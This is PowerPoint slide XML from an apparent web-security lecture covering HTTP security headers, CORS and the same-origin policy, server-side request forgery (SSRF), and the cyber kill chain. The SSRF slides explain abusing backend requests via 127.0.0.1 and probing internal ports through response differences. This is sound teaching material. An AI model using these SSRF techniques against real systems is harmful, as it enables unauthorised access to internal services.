            <a:endParaRPr sz="1634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F20DD-7B37-3067-E0EE-99FFF4B49F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5053549" y="4993705"/>
            <a:ext cx="4850732" cy="134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34" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#:~:text=The%20HTTP%20X%2DXSS%2DProtection,site%20scripting%20(XSS)%20attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="163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79B28-7F8C-23A5-7EB4-C287DD9AD5C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015778" y="5050900"/>
            <a:ext cx="3181190" cy="59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There are a ton of Headers to activate out there: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32D-82E6-1FE0-720D-D4F92D00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Cross-Origin-Resource Sharing (CORS) Motivation and Same Site Origin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EAC6A-5904-5612-6C7E-0D060DF7B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25D54-3CE3-FF04-4065-69D2EEECBF70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036205" y="1492624"/>
            <a:ext cx="8713694" cy="260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347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0"/>
              <a:t>CORS enables loading of resources from different domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0"/>
              <a:t>Why necessary? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Modern apps often use APIs or resources from third parties (e.g. pulling videos from video platform, pulling fonts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Why is that a problem? CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>How is that solved? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Same-Origin Policy: Modern browsers require clients to only request resources with the same origin as the URL of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="311216" indent="-311216">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1634" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1634" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259347" lvl="3" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1634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20F733-D786-9572-36A0-4A3D588DBF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2035708" y="3779653"/>
          <a:ext cx="8370792" cy="3236515"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2948984">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2344049589"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2631544">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1276510854"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2790264">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1582357981"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3319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URL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Outcome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Reason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140919"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="580913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1">
                          <a:effectLst/>
                          <a:latin typeface="AmazonEmber"/>
                        </a:rPr>
                        <a:t>http://store.aws.com/dir2/new.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:effectLst/>
                      </a:endParaRP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Same origin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Only the path differs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609998"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="580913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="AmazonEmber"/>
                        </a:rPr>
                        <a:t>http://store.aws.com/dir/inner/other.html        </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:effectLst/>
                      </a:endParaRP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Same origin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Only the path differs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774402"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="580913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1">
                          <a:effectLst/>
                          <a:latin typeface="AmazonEmber"/>
                        </a:rPr>
                        <a:t>https://store.aws.com/page.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:effectLst/>
                      </a:endParaRP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Different origin      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Different protocol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843324"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="580913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1">
                          <a:effectLst/>
                          <a:latin typeface="AmazonEmber"/>
                        </a:rPr>
                        <a:t>http://store.aws.com:81/dir/page.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:effectLst/>
                      </a:endParaRP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Different origin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Different port (http:// is port 80 by default)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770497"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="580913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1">
                          <a:effectLst/>
                          <a:latin typeface="AmazonEmber"/>
                        </a:rPr>
                        <a:t>http://news.aws.com/dir/page.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:effectLst/>
                      </a:endParaRP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Different origin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Different host</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="82988" marR="82988" marT="41494" marB="414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97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16E683-2DA3-1636-33A4-BA548993448D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036205" y="3299908"/>
            <a:ext cx="3644858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u="sng" dirty="0"/>
              <a:t>Examples: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82625-8A4E-A68E-E483-BD42B3F0DD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036205" y="6443090"/>
            <a:ext cx="4852968" cy="23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8" dirty="0"/>
              <a:t>Source: https://aws.amazon.com/what-is/cross-origin-resource-sharing/?nc1=h_ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169423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8202-C749-8643-4718-F2029D0A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part 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554FC9-665B-7AB7-7C8E-8C0C78E18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21A59-CC08-6EC6-E244-66156CDC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341" y="1215999"/>
            <a:ext cx="5325035" cy="1727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B4AF80-B234-3361-028F-F0422BBCD1FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983966" y="1346443"/>
            <a:ext cx="1523241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‘current origin’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EC668-C0E5-5D8A-C0F2-CCA37E343467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6856719" y="2943990"/>
            <a:ext cx="1523241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‘cross origin’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A147F-1C71-D51F-6C96-81B7C56A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784" y="3075688"/>
            <a:ext cx="4846170" cy="3257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0C1A8A-8F2E-7870-96A6-034E098304D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133345" y="3372975"/>
            <a:ext cx="3457815" cy="679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1" dirty="0"/>
              <a:t>CORS Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1271" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/shrutikapoor08/blogs/tree/master/code-examples/CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="127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E235B-7274-8513-D592-0B78C65CA16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7133345" y="4541537"/>
            <a:ext cx="3457815" cy="84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/>
              <a:t>So, the client checks if the responses are from a valid domain (set by the Access-Control-Allow-Origin header).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1634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21062D-1961-C43E-465A-3ECA2F48A74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5218799" y="6283700"/>
            <a:ext cx="4851315" cy="371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8" dirty="0"/>
              <a:t>Sources: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="908" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.freecodecamp.org/news/access-control-allow-origin-header-explained/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="908" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="908" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#the_http_response_headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="908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39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16A5-B5B5-AAD6-F8A0-388671DC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Server-Side Request Forgery (SSRF)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CB259-BF38-05B8-25B6-24E20F76E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9D27F-3F36-27C0-B104-D25296A1DA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910747" y="4673814"/>
            <a:ext cx="8542100" cy="84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Idea:</a:t>
            </a:r>
          </a:p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634" dirty="0"/>
              <a:t>Attacker circumvents access controls by modifying request for backend calls</a:t>
            </a:r>
          </a:p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634" dirty="0"/>
              <a:t>Typically supplying URL with 127.0.0.1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238B4-35A4-569A-F63C-7BD9D855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03" y="1337416"/>
            <a:ext cx="9034006" cy="34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8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A994-F62A-63AB-45B3-47C4084C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SSRF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49C4B-05C0-77F6-3251-661C662C7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58242-7447-B72E-D94A-7F73286C1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07" y="1354311"/>
            <a:ext cx="7443986" cy="1201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CD1F3-5CFE-1110-5839-FC3669862C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808309" y="1052662"/>
            <a:ext cx="3112034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request to lookup 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C47EA-AF1F-6FAD-E2BD-98BDA872C41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910747" y="2586141"/>
            <a:ext cx="3112034" cy="59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347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>backend is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="259347" indent="-259347">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Attacker modifies request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1634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9D8A3F-5A3B-DAD3-F404-02AB05B2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636" y="3172727"/>
            <a:ext cx="7547735" cy="1262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24E185-5691-8A9B-529C-BBEFA25E92EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808309" y="4425649"/>
            <a:ext cx="8782850" cy="1098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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Why does this work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Request comes from own machine thereby circumventing authentication / access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1634" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Also possible to attack weaker protected backend machines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="163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DD992E-5391-E53D-C35B-8E3A6336D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685" y="5497183"/>
            <a:ext cx="7530443" cy="1314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7EEA32-5314-47FA-B9E5-B58CF5EE9FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7755751" y="5157417"/>
            <a:ext cx="4854326" cy="238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53" dirty="0"/>
              <a:t>more here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="953" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/ssrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="953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92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E8B3-5948-E22A-501E-79E23683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Phases in an attack – Cyber Kill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412B4-D710-0660-8F84-5E869FBC0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614FB-C46C-1908-1F3E-4A36B38D0AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1820174"/>
            <a:ext cx="1083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Model from Lockheed Martin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762088-8694-F534-2CE5-49903FE037DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520460" y="1346444"/>
          <a:ext cx="11442356" cy="5350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710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A7E0-455F-1C9D-9A06-54CDBA97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look for SSRF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0715B-EA2F-CC31-22B8-2E924D0E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03BAA-907B-7E81-0931-A294E5018014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015778" y="4615247"/>
            <a:ext cx="8022131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4" dirty="0"/>
              <a:t>From a report 76 publicly disclosed reports on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0" err="1"/>
              <a:t>hackerone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="163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79D6E-82FD-C0CE-EF52-13D74731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06" y="2121327"/>
            <a:ext cx="4798388" cy="219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01A4CD-78F8-9340-FB1D-ADC16D647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8" r="1017"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055013" y="1346443"/>
            <a:ext cx="9438508" cy="5255879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E824A4-16B8-E5DB-6B22-905D57A8F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spcAft>
                <a:spcPts val="545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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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545"/>
                </a:spcAft>
              </a:pPr>
              <a:t>41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95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1B70-E5F7-FA56-4AD9-A0679A9B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prevention mechanisms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CDF0-27E7-3D4B-B225-5F8085F63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046B2-FDB9-50EF-F53B-40914C375867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669997" y="1711037"/>
            <a:ext cx="8506225" cy="59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634" dirty="0"/>
              <a:t>check if difference between commonly open ports (e.g. 80, 443) and closed (e.g. 11) in responses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676A9-FE16-603C-7673-AC727CC6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09" y="2689780"/>
            <a:ext cx="4608182" cy="397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31D55-0E8B-1A95-B067-4F205359E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37" y="3772934"/>
            <a:ext cx="4357455" cy="285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47C19-F858-FEC9-C9D4-123AB4FAA8B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910747" y="3139516"/>
            <a:ext cx="8506225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634" dirty="0"/>
              <a:t>should be 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57734-74D5-8C40-3EE0-CF95C464CCE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910747" y="4188874"/>
            <a:ext cx="8506225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634" dirty="0"/>
              <a:t>should return internal server error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411406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DD4B-8A7D-F59F-6D73-154CEEDA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consider bypasses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D3557-9B49-7EAF-6140-468A0E4C6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1AA66-588D-7892-0996-301AD76B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97" y="1492353"/>
            <a:ext cx="8619807" cy="387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8508" y="530199"/>
            <a:ext cx="5532504" cy="5417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5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04"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="141" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="59" dirty="0"/>
              <a:t>Layer</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="218" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="68" dirty="0"/>
              <a:t>Security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38359" y="1821226"/>
            <a:ext cx="7834833" cy="3565571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="73767" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="270873" indent="-259923">
              <a:spcBef>
                <a:spcPts val="581"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pP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Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="218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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="218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94" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="218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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="224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part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="218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2859" spc="218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2859" spc="218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109" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>puzzle.</a:t>
            </a:r>
            <a:endParaRPr sz="2859" baseline="1322" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270873" indent="-259923">
              <a:spcBef>
                <a:spcPts val="486"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2859" spc="94" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="204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users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="211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102" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="211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still</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="211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68" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="204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your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="94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81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="211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61" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application.</a:t>
            </a:r>
            <a:endParaRPr sz="2859" baseline="1322" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270873" marR="526762" indent="-259923">
              <a:lnSpc>
                <a:spcPct val="118600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="64"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pP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This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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means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74" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you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have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secure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68" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application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itself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too,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not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just</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="183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-34" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1906" spc="54" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>communication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1906" spc="109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06" spc="36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>channel.</a:t>
            </a:r>
            <a:endParaRPr sz="1906" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270873" indent="-259923">
              <a:spcBef>
                <a:spcPts val="549"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="270873" algn="l"/>
                <a:tab pos="271450" algn="l"/>
              </a:tabLst>
            </a:pP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Security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issues</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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arise</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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due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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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102" baseline="1322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2859" spc="19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81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="19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2859" spc="81" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2859" spc="190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61" baseline="1322" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>application.</a:t>
            </a:r>
            <a:endParaRPr sz="2859" baseline="1322" dirty="0">
              <a:latin typeface="Calibri"/>
